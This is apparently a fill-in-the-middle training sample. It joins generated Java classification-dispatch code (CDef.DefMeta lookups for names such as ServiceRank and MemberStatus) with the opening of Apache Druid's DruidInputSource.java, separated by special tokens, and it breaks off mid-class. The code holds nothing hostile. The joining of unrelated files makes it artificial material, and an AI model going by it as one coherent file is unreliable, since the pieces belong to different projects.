if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.valueOf(name); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.valueOf(name); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.valueOf(name); }
if (BarCls.name().equals(name())) { return CDef.BarCls.valueOf(name); }
if (FooCls.name().equals(name())) { return CDef.FooCls.valueOf(name); }
if (Flg.name().equals(name())) { return CDef.Flg.valueOf(name); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.valueOf(name); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.valueOf(name); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listAll() {
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listAll()); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listAll()); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listAll()); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listAll()); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listAll()); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listAll()); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listAll()); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listAll()); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listAll()); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listAll()); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listAll()); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listAll()); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listAll()); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listAll()); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listAll()); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listAll()); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listAll()); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listAll()); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listAll()); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listAll()); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listAll()); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listAll()); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listAll()); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listAll()); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listAll()); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listAll()); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listAll()); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listAll()); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listByGroup(String groupName) { // exception if not found
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listByGroup(groupName)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listByGroup(groupName)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listByGroup(groupName)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listByGroup(groupName)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listByGroup(groupName)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listByGroup(groupName)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listByGroup(groupName)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listByGroup(groupName)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listByGroup(groupName)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listByGroup(groupName)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listByGroup(groupName)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listByGroup(groupName)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listByGroup(groupName)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listByGroup(groupName)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listByGroup(groupName)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listByGroup(groupName)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listByGroup(groupName)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listByGroup(groupName)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listByGroup(groupName)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listByGroup(groupName)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listByGroup(groupName)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listByGroup(groupName)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listByGroup(groupName)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listByGroup(groupName)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listByGroup(groupName)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listByGroup(groupName)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listByGroup(groupName)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listByGroup(groupName)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listOf(Collection<String> codeList) {
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listOf(codeList)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listOf(codeList)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listOf(codeList)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listOf(codeList)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listOf(codeList)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listOf(codeList)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listOf(codeList)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listOf(codeList)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listOf(codeList)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listOf(codeList)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listOf(codeList)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listOf(codeList)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listOf(codeList)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listOf(codeList)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listOf(codeList)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listOf(codeList)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listOf(codeList)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listOf(codeList)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listOf(codeList)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listOf(codeList)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listOf(codeList)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listOf(codeList)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listOf(codeList)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listOf(codeList)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listOf(codeList)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listOf(codeList)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listOf(codeList)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listOf(codeList)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> groupOf(String groupName) { // old style
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.groupOf(groupName)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.groupOf(groupName)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.groupOf(groupName)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.groupOf(groupName)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.groupOf(groupName)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.groupOf(groupName)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.groupOf(groupName)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.groupOf(groupName)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.groupOf(groupName)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.groupOf(groupName)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.groupOf(groupName)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.groupOf(groupName)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.groupOf(groupName)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.groupOf(groupName)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.groupOf(groupName)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.groupOf(groupName)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.groupOf(groupName)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.groupOf(groupName)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.groupOf(groupName)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.groupOf(groupName)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.groupOf(groupName)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.groupOf(groupName)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.groupOf(groupName)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.groupOf(groupName)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.groupOf(groupName)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.groupOf(groupName)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.groupOf(groupName)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.groupOf(groupName)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
/**
 * Narrow a concrete CDef element list to {@code List<Classification>}.
 * The unchecked cast is safe because every CDef enum implements Classification.
 * @param clsList The list of concrete classification elements. (NotNull)
 * @return The same list viewed through the Classification interface. (NotNull)
 */
@SuppressWarnings("unchecked")
private List<Classification> toClsList(List<?> clsList) {
    return (List<Classification>)clsList;
}
/**
 * Provide the code type (String, Number, Boolean) declared for this classification.
 * Generated dispatch: one branch per classification; falls back to String.
 * @return The code type of this classification's codes. (NotNull)
 */
public ClassificationCodeType codeType() {
    if (ServiceRank.name().equals(name())) { return ClassificationCodeType.String; }
    if (Region.name().equals(name())) { return ClassificationCodeType.Number; }
    if (WithdrawalReason.name().equals(name())) { return ClassificationCodeType.String; }
    if (PaymentMethod.name().equals(name())) { return ClassificationCodeType.String; }
    if (GroupingReference.name().equals(name())) { return ClassificationCodeType.String; }
    if (SelfReference.name().equals(name())) { return ClassificationCodeType.Number; }
    if (TopCommentOnly.name().equals(name())) { return ClassificationCodeType.String; }
    if (SubItemImplicit.name().equals(name())) { return ClassificationCodeType.Number; }
    if (SubItemTable.name().equals(name())) { return ClassificationCodeType.String; }
    if (BooleanFlg.name().equals(name())) { return ClassificationCodeType.Boolean; }
    if (VariantRelationMasterType.name().equals(name())) { return ClassificationCodeType.String; }
    if (VariantRelationQuxType.name().equals(name())) { return ClassificationCodeType.String; }
    if (QuxCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (EscapedDfpropCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (EscapedJavaDocCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (EscapedNumberInitialCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (LineSepCommentCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (NamingDefaultCamelizingType.name().equals(name())) { return ClassificationCodeType.String; }
    if (NamingNoCamelizingType.name().equals(name())) { return ClassificationCodeType.String; }
    if (DeprecatedTopBasicType.name().equals(name())) { return ClassificationCodeType.String; }
    if (DeprecatedMapBasicType.name().equals(name())) { return ClassificationCodeType.String; }
    if (DeprecatedMapCollaborationType.name().equals(name())) { return ClassificationCodeType.String; }
    if (UQClassificationType.name().equals(name())) { return ClassificationCodeType.String; }
    if (BarCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (FooCls.name().equals(name())) { return ClassificationCodeType.String; }
    if (Flg.name().equals(name())) { return ClassificationCodeType.Number; }
    if (MemberStatus.name().equals(name())) { return ClassificationCodeType.String; }
    if (ProductStatus.name().equals(name())) { return ClassificationCodeType.String; }
    return ClassificationCodeType.String; // as default
}
/**
 * Provide the handling policy for undefined (unknown) classification codes.
 * Every classification here is configured to throw; LOGGING is only the fallback.
 * @return The undefined-handling type for this classification. (NotNull)
 */
public ClassificationUndefinedHandlingType undefinedHandlingType() {
    if (ServiceRank.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (Region.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (WithdrawalReason.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (PaymentMethod.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (GroupingReference.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (SelfReference.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (TopCommentOnly.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (SubItemImplicit.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (SubItemTable.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (BooleanFlg.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (VariantRelationMasterType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (VariantRelationQuxType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (QuxCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (EscapedDfpropCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (EscapedJavaDocCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (EscapedNumberInitialCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (LineSepCommentCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (NamingDefaultCamelizingType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (NamingNoCamelizingType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (DeprecatedTopBasicType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (DeprecatedMapBasicType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (DeprecatedMapCollaborationType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (UQClassificationType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (BarCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (FooCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (Flg.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (MemberStatus.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    if (ProductStatus.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
    return ClassificationUndefinedHandlingType.LOGGING; // as default
}
/**
 * Find the classification meta by its name, case-insensitively (preferred over valueOf()).
 * @param classificationName The string of classification name, which is case-insensitive. (NotNull)
 * @return The optional classification meta. (NotNull, EmptyAllowed: throws ClassificationNotFoundException when accessed empty)
 * @throws IllegalArgumentException When the argument is null.
 */
public static OptionalThing<CDef.DefMeta> find(String classificationName) { // instead of valueOf()
    if (classificationName == null) { throw new IllegalArgumentException("The argument 'classificationName' should not be null."); }
    if (ServiceRank.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.ServiceRank); }
    if (Region.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.Region); }
    if (WithdrawalReason.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.WithdrawalReason); }
    if (PaymentMethod.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.PaymentMethod); }
    if (GroupingReference.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.GroupingReference); }
    if (SelfReference.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SelfReference); }
    if (TopCommentOnly.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.TopCommentOnly); }
    if (SubItemImplicit.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SubItemImplicit); }
    if (SubItemTable.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SubItemTable); }
    if (BooleanFlg.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.BooleanFlg); }
    if (VariantRelationMasterType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.VariantRelationMasterType); }
    if (VariantRelationQuxType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.VariantRelationQuxType); }
    if (QuxCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.QuxCls); }
    if (EscapedDfpropCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedDfpropCls); }
    if (EscapedJavaDocCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedJavaDocCls); }
    if (EscapedNumberInitialCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedNumberInitialCls); }
    if (LineSepCommentCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.LineSepCommentCls); }
    if (NamingDefaultCamelizingType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.NamingDefaultCamelizingType); }
    if (NamingNoCamelizingType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.NamingNoCamelizingType); }
    if (DeprecatedTopBasicType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedTopBasicType); }
    if (DeprecatedMapBasicType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedMapBasicType); }
    if (DeprecatedMapCollaborationType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedMapCollaborationType); }
    if (UQClassificationType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.UQClassificationType); }
    if (BarCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.BarCls); }
    if (FooCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.FooCls); }
    if (Flg.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.Flg); }
    if (MemberStatus.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.MemberStatus); }
    if (ProductStatus.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.ProductStatus); }
    return OptionalThing.ofNullable(null, () -> {
        throw new ClassificationNotFoundException("Unknown classification: " + classificationName);
    });
}
/**
 * Find the classification meta by its name, case-insensitively (old style; prefer find(name)).
 * @param classificationName The string of classification name, which is case-insensitive. (NotNull)
 * @return The matched classification meta. (NotNull)
 * @throws IllegalArgumentException When the argument is null.
 * @throws IllegalStateException When the name matches no classification (unlike find(), not optional).
 */
public static CDef.DefMeta meta(String classificationName) { // old style so use find(name)
    if (classificationName == null) { throw new IllegalArgumentException("The argument 'classificationName' should not be null."); }
    if (ServiceRank.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.ServiceRank; }
    if (Region.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.Region; }
    if (WithdrawalReason.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.WithdrawalReason; }
    if (PaymentMethod.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.PaymentMethod; }
    if (GroupingReference.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.GroupingReference; }
    if (SelfReference.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SelfReference; }
    if (TopCommentOnly.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.TopCommentOnly; }
    if (SubItemImplicit.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SubItemImplicit; }
    if (SubItemTable.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SubItemTable; }
    if (BooleanFlg.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.BooleanFlg; }
    if (VariantRelationMasterType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.VariantRelationMasterType; }
    if (VariantRelationQuxType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.VariantRelationQuxType; }
    if (QuxCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.QuxCls; }
    if (EscapedDfpropCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedDfpropCls; }
    if (EscapedJavaDocCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedJavaDocCls; }
    if (EscapedNumberInitialCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedNumberInitialCls; }
    if (LineSepCommentCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.LineSepCommentCls; }
    if (NamingDefaultCamelizingType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.NamingDefaultCamelizingType; }
    if (NamingNoCamelizingType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.NamingNoCamelizingType; }
    if (DeprecatedTopBasicType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedTopBasicType; }
    if (DeprecatedMapBasicType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedMapBasicType; }
    if (DeprecatedMapCollaborationType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedMapCollaborationType; }
    if (UQClassificationType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.UQClassificationType; }
    if (BarCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.BarCls; }
    if (FooCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.FooCls; }
    if (Flg.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.Flg; }
    if (MemberStatus.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.MemberStatus; }
    if (ProductStatus.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.ProductStatus; }
    throw new IllegalStateException("Unknown classification: " + classificationName);
}
/**
 * Internal dummy that references emptyStrings() so the generated import is never flagged unused.
 * @return An empty string array. (NotNull)
 */
@SuppressWarnings("unused")
private String[] xinternalEmptyString() {
    return emptyStrings(); // to suppress 'unused' warning of import statement
}
}
}<|fim▁end|> | * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<UQClassificationType> listOf(Collection<String> codeList) {
|
<|file_name|>DruidInputSource.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexing.input;
import com.fasterxml.jackson.annotation.JacksonInject;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.google.common.base.Preconditions;
import com.google.common.collect.FluentIterable;
import com.google.common.collect.Iterators;
import org.apache.druid.client.coordinator.CoordinatorClient;
import org.apache.druid.data.input.AbstractInputSource;
import org.apache.druid.data.input.InputFileAttribute;
import org.apache.druid.data.input.InputFormat;
import org.apache.druid.data.input.InputRowSchema;
import org.apache.druid.data.input.InputSourceReader;
import org.apache.druid.data.input.InputSplit;
import org.apache.druid.data.input.MaxSizeSplitHintSpec;
import org.apache.druid.data.input.SegmentsSplitHintSpec;
import org.apache.druid.data.input.SplitHintSpec;
import org.apache.druid.data.input.impl.InputEntityIteratingReader;
import org.apache.druid.data.input.impl.SplittableInputSource;
import org.apache.druid.indexing.common.ReingestionTimelineUtils;
import org.apache.druid.indexing.common.RetryPolicy;
import org.apache.druid.indexing.common.RetryPolicyFactory;
import org.apache.druid.indexing.common.SegmentLoaderFactory;
import org.apache.druid.indexing.firehose.WindowedSegmentId;
import org.apache.druid.java.util.common.IAE;
import org.apache.druid.java.util.common.ISE;
import org.apache.druid.java.util.common.guava.Comparators;
import org.apache.druid.java.util.common.logger.Logger;
import org.apache.druid.query.filter.DimFilter;
import org.apache.druid.segment.IndexIO;
import org.apache.druid.segment.loading.SegmentLoader;
import org.apache.druid.timeline.DataSegment;
import org.apache.druid.timeline.TimelineObjectHolder;
import org.apache.druid.timeline.VersionedIntervalTimeline;
import org.apache.druid.timeline.partition.PartitionChunk;
import org.apache.druid.timeline.partition.PartitionHolder;
import org.apache.druid.utils.Streams;
import org.joda.time.Duration;
import org.joda.time.Interval;
import javax.annotation.Nullable;
import java.io.File;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.SortedMap;
import java.util.TreeMap;
import java.util.concurrent.ThreadLocalRandom;
import java.util.stream.Stream;
public class DruidInputSource extends AbstractInputSource implements SplittableInputSource<List<WindowedSegmentId>>
{
private static final Logger LOG = new Logger(DruidInputSource.class);
/**
* A Comparator that orders {@link WindowedSegmentId} mainly by segmentId (which is important), and then by intervals
* (which is arbitrary, and only here for totality of ordering).
*/
private static final Comparator<WindowedSegmentId> WINDOWED_SEGMENT_ID_COMPARATOR =
Comparator.comparing(WindowedSegmentId::getSegmentId)
.thenComparing(windowedSegmentId -> windowedSegmentId.getIntervals().size())
.thenComparing(
(WindowedSegmentId a, WindowedSegmentId b) -> {
// Same segmentId, same intervals list size. Compare each interval.
int cmp = 0;
for (int i = 0; i < a.getIntervals().size(); i++) {
cmp = Comparators.intervalsByStartThenEnd()
.compare(a.getIntervals().get(i), b.getIntervals().get(i));
if (cmp != 0) {
return cmp;
}
}
return cmp;
}
);
private final String dataSource;
// Exactly one of interval and segmentIds should be non-null. Typically 'interval' is specified directly
// by the user creating this firehose and 'segmentIds' is used for sub-tasks if it is split for parallel
// batch ingestion.
@Nullable
private final Interval interval;
@Nullable
private final List<WindowedSegmentId> segmentIds;
private final DimFilter dimFilter;
private final List<String> dimensions;
private final List<String> metrics;
private final IndexIO indexIO;
private final CoordinatorClient coordinatorClient;
private final SegmentLoaderFactory segmentLoaderFactory;
private final RetryPolicyFactory retryPolicyFactory;
/**
